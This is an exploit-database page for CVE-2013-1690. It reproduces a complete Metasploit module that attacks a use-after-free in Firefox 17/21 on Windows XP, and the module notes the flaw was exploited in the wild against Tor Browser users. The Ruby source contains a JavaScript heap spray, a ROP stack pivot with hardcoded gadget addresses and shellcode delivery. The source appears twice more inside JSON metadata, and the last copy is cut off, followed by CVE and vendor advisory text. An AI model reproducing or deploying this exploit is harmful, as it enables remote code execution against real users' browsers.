Firefox onreadystatechange Event DocumentViewerImpl Use After Free
2013-08-08T00:00:00
ID 1337DAY-ID-21082 Type zdt Reporter metasploit Modified 2013-08-08T00:00:00
Description
This Metasploit module exploits a vulnerability found on Firefox 17.0.6, specifically an use after free of a DocumentViewerImpl object, triggered via an specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox onreadystatechange Event DocumentViewerImpl Use After Free',
'Description' => %q{
This module exploits a vulnerability found on Firefox 17.0.6, specifically an use
after free of a DocumentViewerImpl object, triggered via an specially crafted web
page using onreadystatechange events and the window.stop() API, as exploited in the
wild on 2013 August to target Tor Browser users.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nils', # vulnerability discovery
'Unknown', # 1day exploit, prolly the FBI
'w3bd3vil', # 1day analysis
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-1690' ],
[ 'OSVDB', '94584'],
[ 'BID', '60778'],
[ 'URL', 'https://www.mozilla.org/security/announce/2013/mfsa2013-53.html' ],
[ 'URL', 'https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html' ],
[ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=901365' ],
[ 'URL', 'http://krash.in/ffn0day.txt' ],
[ 'URL', 'http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Firefox 17 & Firefox 21 / Windows XP SP3',
{
'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory
'RetGadget' => 0x77c3ee16, # ret from msvcrt
'StackPivot' => 0x76C9B4C2, # xcht ecx,esp # or byte ptr[eax], al # add byte ptr [edi+5Eh], bl # ret 8 from IMAGEHLP
'VFuncPtr' => 0x0c10100c # Fake Function Pointer to the Sprayed Memory
}
]
],
'DisclosureDate' => 'Jun 25 2013',
'DefaultTarget' => 0))
end
def stack_pivot
pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb
pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
return pivot
end
def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
vprint_status("Agent: #{agent}")
if agent !~ /Windows NT 5\.1/
print_error("Windows XP not found, sending 404: #{agent}")
send_not_found(cli)
return
end
if agent !~ /Firefox\/17/ or agent !~ /Firefox\/21/
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
my_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
# build html
code = [
target['VFuncPtr'],
target['RetGadget'],
target['StackPivot'],
junk
].pack("V*")
code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch))
content = <<-HTML
<html>
<body>
<iframe src="#{my_uri}/iframe.html"></iframe>
</body></html>
HTML
# build iframe
iframe = <<-IFRAME
<script>
var z="<body><img src='nonexistant.html' onerror=\\"\\" ></body>";
var test = new Array();
var heap_chunks;
function heapSpray(shellcode, fillsled) {
var chunk_size, headersize, fillsled_len, code;
var i, codewithnum;
chunk_size = 0x40000;
headersize = 0x10;
fillsled_len = chunk_size - (headersize + shellcode.length);
while (fillsled.length <fillsled_len)
fillsled += fillsled;
fillsled = fillsled.substring(0, fillsled_len);
code = shellcode + fillsled;
heap_chunks = new Array();
for (i = 0; i<1000; i++)
{
codewithnum = "HERE" + code;
heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
}
}
function b() {
for(var c=0;1024>c;c++) {
test[c]=new ArrayBuffer(180);
bufView = new Uint32Array(test[c]);
for (var i=0; i < 45; i++) {
bufView[i] = #{target['FakeObject']};
}
}
}
function a() {
window.stop();
var myshellcode = unescape("#{js_code}");
var myfillsled = unescape("#{js_random}");
heapSpray(myshellcode,myfillsled);
b();
window.parent.frames[0].frameElement.ownerDocument.write(z);
}
document.addEventListener("readystatechange",a,null);
</script>
IFRAME
print_status("URI #{request.uri} requested...")
if request.uri =~ /iframe\.html/
print_status("Sending iframe HTML")
send_response(cli, iframe, {'Content-Type'=>'text/html'})
return
end
print_status("Sending HTML")
send_response(cli, content, {'Content-Type'=>'text/html'})
end
end
# 0day.today [2018-01-01] #
{"id": "1337DAY-ID-21082", "lastseen": "2018-01-01T15:04:42", "viewCount": 10, "bulletinFamily": "exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 2, "enchantments": {"score": {"value": 8.3, "vector": "NONE", "modified": "2018-01-01T15:04:42", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1690"]}, {"type": "mozilla", "idList": ["MFSA2013-53"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MOZILLA_FIREFOX_ONREADYSTATECHANGE"]}, {"type": "saint", "idList": ["SAINT:777991960CE017DA619939903D62924F", "SAINT:3A0ADAAFFAFD468DC437DB98F455F7D0", "SAINT:14E92DF0A7C5748213D702F14670E0F6"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122750"]}, {"type": "exploitdb", "idList": ["EDB-ID:27429"]}, {"type": "seebug", "idList": ["SSV:60948"]}, {"type": "threatpost", "idList": ["THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB"]}, {"type": "openvas", "idList": ["OPENVAS:903220", "OPENVAS:850496", "OPENVAS:1361412562310892716", "OPENVAS:1361412562310903221", "OPENVAS:1361412562310881757", "OPENVAS:1361412562310903216", "OPENVAS:841489", "OPENVAS:1361412562310123604", "OPENVAS:903221", "OPENVAS:1361412562310881759"]}, {"type": "nessus", "idList": ["SUSE_FIREFOX-20130628-8636.NASL", "MACOSX_THUNDERBIRD_17_0_7_ESR.NASL", "ORACLELINUX_ELSA-2013-0981.NASL", "CENTOS_RHSA-2013-0981.NASL", "REDHAT-RHSA-2013-0981.NASL", "DEBIAN_DSA-2716.NASL", "UBUNTU_USN-1891-1.NASL", "MOZILLA_FIREFOX_1707_ESR.NASL", "SUSE_11_FIREFOX-20130628-130628.NASL", "ORACLELINUX_ELSA-2013-0982.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:1143-1", "OPENSUSE-SU-2013:1141-1", "OPENSUSE-SU-2013:1142-1", "SUSE-SU-2013:1153-1", "OPENSUSE-SU-2013:1176-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2716-1:03728", "DEBIAN:DSA-2720-1:1CEA2"]}, {"type": "centos", "idList": ["CESA-2013:0982", "CESA-2013:0981"]}, {"type": "redhat", "idList": ["RHSA-2013:0981", "RHSA-2013:0982"]}, {"type": "ubuntu", "idList": ["USN-1890-2", "USN-1891-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0981", "ELSA-2013-0982"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13141"]}], "modified": "2018-01-01T15:04:42", "rev": 2}, "vulnersScore": 8.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/21082", "description": "This Metasploit module exploits a vulnerability found on Firefox 17.0.6, specifically an use after free of a DocumentViewerImpl object, triggered via an specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users.", "title": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free", "cvelist": ["CVE-2013-1690"], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Firefox onreadystatechange Event DocumentViewerImpl Use After Free',\r\n 'Description' => %q{\r\n This module exploits a vulnerability found on Firefox 17.0.6, specifically an use\r\n after free of a DocumentViewerImpl object, triggered via an specially crafted web\r\n page using onreadystatechange events and the window.stop() API, as exploited in the\r\n wild on 2013 August to target Tor Browser users.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Nils', # vulnerability discovery\r\n 'Unknown', # 1day exploit, prolly the FBI\r\n 'w3bd3vil', # 1day analysis\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1690' ],\r\n [ 'OSVDB', '94584'],\r\n [ 'BID', '60778'],\r\n [ 'URL', 'https://www.mozilla.org/security/announce/2013/mfsa2013-53.html' ],\r\n [ 'URL', 'https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html' ],\r\n [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=901365' ],\r\n [ 'URL', 'http://krash.in/ffn0day.txt' ],\r\n [ 'URL', 'http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Firefox 17 & Firefox 21 / Windows XP SP3',\r\n {\r\n 'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory\r\n 'RetGadget' => 0x77c3ee16, # ret from msvcrt\r\n 'StackPivot' => 0x76C9B4C2, # xcht ecx,esp # or byte ptr[eax], al # add byte ptr [edi+5Eh], bl # ret 8 from IMAGEHLP\r\n 'VFuncPtr' => 0x0c10100c # Fake Function Pointer to the Sprayed Memory\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => 'Jun 25 2013',\r\n 'DefaultTarget' => 0))\r\n \r\n end\r\n \r\n def stack_pivot\r\n pivot = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\r\n pivot << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\r\n pivot << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\r\n pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\r\n return pivot\r\n end\r\n \r\n def junk(n=4)\r\n return rand_text_alpha(n).unpack(\"V\").first\r\n end\r\n \r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n vprint_status(\"Agent: #{agent}\")\r\n \r\n if agent !~ /Windows NT 5\\.1/\r\n print_error(\"Windows XP not found, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n if agent !~ /Firefox\\/17/ or agent !~ /Firefox\\/21/\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n my_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource\r\n \r\n # build html\r\n code = [\r\n target['VFuncPtr'],\r\n target['RetGadget'],\r\n target['StackPivot'],\r\n junk\r\n ].pack(\"V*\")\r\n code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})\r\n js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))\r\n js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch))\r\n \r\n content = <<-HTML\r\n<html>\r\n<body>\r\n<iframe src=\"#{my_uri}/iframe.html\"></iframe>\r\n</body></html>\r\n HTML\r\n \r\n # build iframe\r\n iframe = <<-IFRAME\r\n<script>\r\nvar z=\"<body><img src='nonexistant.html' onerror=\\\\\"\\\\\" ></body>\";\r\nvar test = new Array();\r\nvar heap_chunks;\r\nfunction heapSpray(shellcode, fillsled) {\r\n var chunk_size, headersize, fillsled_len, code;\r\n var i, codewithnum;\r\n chunk_size = 0x40000;\r\n headersize = 0x10;\r\n fillsled_len = chunk_size - (headersize + shellcode.length);\r\n while (fillsled.length <fillsled_len)\r\n fillsled += fillsled;\r\n fillsled = fillsled.substring(0, fillsled_len);\r\n code = shellcode + fillsled;\r\n heap_chunks = new Array();\r\n for (i = 0; i<1000; i++)\r\n {\r\n codewithnum = \"HERE\" + code;\r\n heap_chunks[i] = codewithnum.substring(0, codewithnum.length);\r\n }\r\n}\r\n \r\n \r\nfunction b() {\r\n for(var c=0;1024>c;c++) {\r\n test[c]=new ArrayBuffer(180);\r\n bufView = new Uint32Array(test[c]);\r\n for (var i=0; i < 45; i++) {\r\n bufView[i] = #{target['FakeObject']};\r\n }\r\n }\r\n}\r\n \r\nfunction a() {\r\n window.stop();\r\n var myshellcode = unescape(\"#{js_code}\");\r\n var myfillsled = unescape(\"#{js_random}\");\r\n heapSpray(myshellcode,myfillsled);\r\n b();\r\n window.parent.frames[0].frameElement.ownerDocument.write(z);\r\n}\r\n \r\ndocument.addEventListener(\"readystatechange\",a,null);\r\n</script>\r\n IFRAME\r\n \r\n print_status(\"URI #{request.uri} requested...\")\r\n \r\n if request.uri =~ /iframe\\.html/\r\n print_status(\"Sending iframe HTML\")\r\n send_response(cli, iframe, {'Content-Type'=>'text/html'})\r\n return\r\n end\r\n \r\n print_status(\"Sending HTML\")\r\n send_response(cli, content, {'Content-Type'=>'text/html'})\r\n \r\n end\r\n \r\nend\n\n# 0day.today [2018-01-01] #", "published": "2013-08-08T00:00:00", "references": [], "reporter": "metasploit", "modified": "2013-08-08T00:00:00", "href": "https://0day.today/exploit/description/21082", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:06:49", "description": "Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location.", "edition": 6, "cvss3": {}, "published": "2013-06-26T03:19:00", "title": "CVE-2013-1690", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1690"], "modified": "2017-09-19T01:36:00", "cpe": ["cpe:/a:mozilla:firefox:20.0.1", "cpe:/a:mozilla:firefox_esr:17.0.3", "cpe:/a:mozilla:firefox_esr:17.0.4", "cpe:/a:mozilla:thunderbird_esr:17.0.3", "cpe:/a:mozilla:firefox_esr:17.0.5", "cpe:/a:mozilla:firefox:20.0", "cpe:/a:mozilla:thunderbird:17.0", "cpe:/a:mozilla:thunderbird_esr:17.0", "cpe:/a:mozilla:thunderbird_esr:17.0.5", "cpe:/a:mozilla:firefox:19.0.1", "cpe:/a:mozilla:firefox_esr:17.0.2", "cpe:/a:mozilla:thunderbird_esr:17.0.2", "cpe:/a:mozilla:thunderbird:17.0.2", "cpe:/a:mozilla:thunderbird_esr:17.0.4", "cpe:/a:mozilla:thunderbird:17.0.5", "cpe:/a:mozilla:thunderbird:17.0.4", "cpe:/a:mozilla:thunderbird:17.0.1", "cpe:/a:mozilla:firefox:19.0.2", "cpe:/a:mozilla:thunderbird:17.0.6", "cpe:/a:mozilla:firefox_esr:17.0", "cpe:/a:mozilla:thunderbird_esr:17.0.6", "cpe:/a:mozilla:thunderbird:17.0.3", "cpe:/a:mozilla:thunderbird_esr:17.0.1", "cpe:/a:mozilla:firefox:19.0", "cpe:/a:mozilla:firefox_esr:17.0.6", "cpe:/a:mozilla:firefox_esr:17.0.1", "cpe:/a:mozilla:firefox:21.0"], "id": "CVE-2013-1690", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1690", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mozilla:firefox_esr:17.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird_esr:17.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird_esr:17.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:17.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird_esr:17.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:17.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:17.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:17.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:17.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:17.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird_esr:17.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:20.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:17.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:20.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird_esr:17.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:19.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:17.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird_esr:17.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:21.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:17.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:17.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:17.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:17.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:17.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:19.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird_esr:17.0.2:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1690"], "description": "Added: 08/22/2013 \nCVE: [CVE-2013-1690](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1690>) \nBID: [60778](<http://www.securityfocus.com/bid/60778>) \nOSVDB: [94584](<http://www.osvdb.org/94584>) \n\n\n### Background\n\n[Firefox](<http://www.mozilla.com/en-US/firefox/>) is a freely available web browser for multiple platforms including Windows, Linux, and Mac OS. \n\n### Problem\n\nA use-after-free vulnerability is triggered when handling `**onreadystatechange**` events and Event or Page reloads at the same time. A remote attacker that persuades a user to open a scpecially crafted page could potentially execute arbitrary code in the context of the vulnerable user. \n\n### Resolution\n\nUpgrade to Firefox 22.0 or newer. \n\n### References\n\n<http://www.mozilla.org/security/announce/2013/mfsa2013-53.html> \n\n\n### Limitations\n\nThis exploit was tested against Mozilla Firefox 17.0.1 and 21.0 on Windows XP SP3 English (DEP OptIn). \n\nThe user must load the exploit page in a vulnerable version of Firefox. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-08-22T00:00:00", "published": "2013-08-22T00:00:00", "id": "SAINT:14E92DF0A7C5748213D702F14670E0F6", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/firefox_onreadystatechange_use_after_free", "type": "saint", "title": "Mozilla Firefox onreadystatechange Event Use After Free", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:29", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1690"], "edition": 2, "description": "Added: 08/22/2013 \nCVE: [CVE-2013-1690](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1690>) \nBID: [60778](<http://www.securityfocus.com/bid/60778>) \nOSVDB: [94584](<http://www.osvdb.org/94584>) \n\n\n### Background\n\n[Firefox](<http://www.mozilla.com/en-US/firefox/>) is a freely available web browser for multiple platforms including Windows, Linux, and Mac OS. \n\n### Problem\n\nA use-after-free vulnerability is triggered when handling `**onreadystatechange**` events and Event or Page reloads at the same time. A remote attacker that persuades a user to open a scpecially crafted page could potentially execute arbitrary code in the context of the vulnerable user. \n\n### Resolution\n\nUpgrade to Firefox 22.0 or newer. \n\n### References\n\n<http://www.mozilla.org/security/announce/2013/mfsa2013-53.html> \n\n\n### Limitations\n\nThis exploit was tested against Mozilla Firefox 17.0.1 and 21.0 on Windows XP SP3 English (DEP OptIn). \n\nThe user must load the exploit page in a vulnerable version of Firefox. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-08-22T00:00:00", "published": "2013-08-22T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/firefox_onreadystatechange_use_after_free", "id": "SAINT:777991960CE017DA619939903D62924F", "type": "saint", "title": "Mozilla Firefox onreadystatechange Event Use After Free", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1690"], "description": "Added: 08/22/2013 \nCVE: [CVE-2013-1690](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1690>) \nBID: [60778](<http://www.securityfocus.com/bid/60778>) \nOSVDB: [94584](<http://www.osvdb.org/94584>) \n\n\n### Background\n\n[Firefox](<http://www.mozilla.com/en-US/firefox/>) is a freely available web browser for multiple platforms including Windows, Linux, and Mac OS. \n\n### Problem\n\nA use-after-free vulnerability is triggered when handling `**onreadystatechange**` events and Event or Page reloads at the same time. A remote attacker that persuades a user to open a scpecially crafted page could potentially execute arbitrary code in the context of the vulnerable user. \n\n### Resolution\n\nUpgrade to Firefox 22.0 or newer. \n\n### References\n\n<http://www.mozilla.org/security/announce/2013/mfsa2013-53.html> \n\n\n### Limitations\n\nThis exploit was tested against Mozilla Firefox 17.0.1 and 21.0 on Windows XP SP3 English (DEP OptIn). \n\nThe user must load the exploit page in a vulnerable version of Firefox. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-08-22T00:00:00", "published": "2013-08-22T00:00:00", "id": "SAINT:3A0ADAAFFAFD468DC437DB98F455F7D0", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/firefox_onreadystatechange_use_after_free", "title": "Mozilla Firefox onreadystatechange Event Use After Free", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:29", "description": "", "published": "2013-08-08T00:00:00", "type": "packetstorm", "title": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1690"], "modified": "2013-08-08T00:00:00", "id": "PACKETSTORM:122750", "href": "https://packetstormsecurity.com/files/122750/Firefox-onreadystatechange-Event-DocumentViewerImpl-Use-After-Free.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Firefox onreadystatechange Event DocumentViewerImpl Use After Free', \n'Description' => %q{ \nThis module exploits a vulnerability found on Firefox 17.0.6, specifically an use \nafter free of a DocumentViewerImpl object, triggered via an specially crafted web \npage using onreadystatechange events and the window.stop() API, as exploited in the \nwild on 2013 August to target Tor Browser users. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Nils', # vulnerability discovery \n'Unknown', # 1day exploit, prolly the FBI \n'w3bd3vil', # 1day analysis \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-1690' ], \n[ 'OSVDB', '94584'], \n[ 'BID', '60778'], \n[ 'URL', 'https://www.mozilla.org/security/announce/2013/mfsa2013-53.html' ], \n[ 'URL', 'https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html' ], \n[ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=901365' ], \n[ 'URL', 'http://krash.in/ffn0day.txt' ], \n[ 'URL', 'http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Firefox 17 & Firefox 21 / Windows XP SP3', \n{ \n'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory \n'RetGadget' => 0x77c3ee16, # ret from msvcrt \n'StackPivot' => 0x76C9B4C2, # xcht ecx,esp # or byte ptr[eax], al # add byte ptr [edi+5Eh], bl # ret 8 from IMAGEHLP \n'VFuncPtr' => 0x0c10100c # Fake Function Pointer to the Sprayed Memory \n} \n] \n], \n'DisclosureDate' => 'Jun 25 2013', \n'DefaultTarget' => 0)) \n \nend \n \ndef stack_pivot \npivot = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb \npivot << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit \npivot << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit \npivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset \nreturn pivot \nend \n \ndef junk(n=4) \nreturn rand_text_alpha(n).unpack(\"V\").first \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nvprint_status(\"Agent: #{agent}\") \n \nif agent !~ /Windows NT 5\\.1/ \nprint_error(\"Windows XP not found, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nif agent !~ /Firefox\\/17/ or agent !~ /Firefox\\/21/ \nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nmy_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource \n \n# build html \ncode = [ \ntarget['VFuncPtr'], \ntarget['RetGadget'], \ntarget['StackPivot'], \njunk \n].pack(\"V*\") \ncode << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'}) \njs_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch)) \njs_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch)) \n \ncontent = <<-HTML \n<html> \n<body> \n<iframe src=\"#{my_uri}/iframe.html\"></iframe> \n</body></html> \nHTML \n \n# build iframe \niframe = <<-IFRAME \n<script> \nvar z=\"<body><img src='nonexistant.html' onerror=\\\\\"\\\\\" ></body>\"; \nvar test = new Array(); \nvar heap_chunks; \nfunction heapSpray(shellcode, fillsled) { \nvar chunk_size, headersize, fillsled_len, code; \nvar i, codewithnum; \nchunk_size = 0x40000; \nheadersize = 0x10; \nfillsled_len = chunk_size - (headersize + shellcode.length); \nwhile (fillsled.length <fillsled_len) \nfillsled += fillsled; \nfillsled = fillsled.substring(0, fillsled_len); \ncode = shellcode + fillsled; \nheap_chunks = new Array(); \nfor (i = 0; i<1000; i++) \n{ \ncodewithnum = \"HERE\" + code; \nheap_chunks[i] = codewithnum.substring(0, codewithnum.length); \n} \n} \n \n \nfunction b() { \nfor(var c=0;1024>c;c++) { \ntest[c]=new ArrayBuffer(180); \nbufView = new Uint32Array(test[c]); \nfor (var i=0; i < 45; i++) { \nbufView[i] = #{target['FakeObject']}; \n} \n} \n} \n \nfunction a() { \nwindow.stop(); \nvar myshellcode = unescape(\"#{js_code}\"); \nvar myfillsled = unescape(\"#{js_random}\"); \nheapSpray(myshellcode,myfillsled); \nb(); \nwindow.parent.frames[0].frameElement.ownerDocument.write(z); \n} \n \ndocument.addEventListener(\"readystatechange\",a,null); \n</script> \nIFRAME \n \nprint_status(\"URI 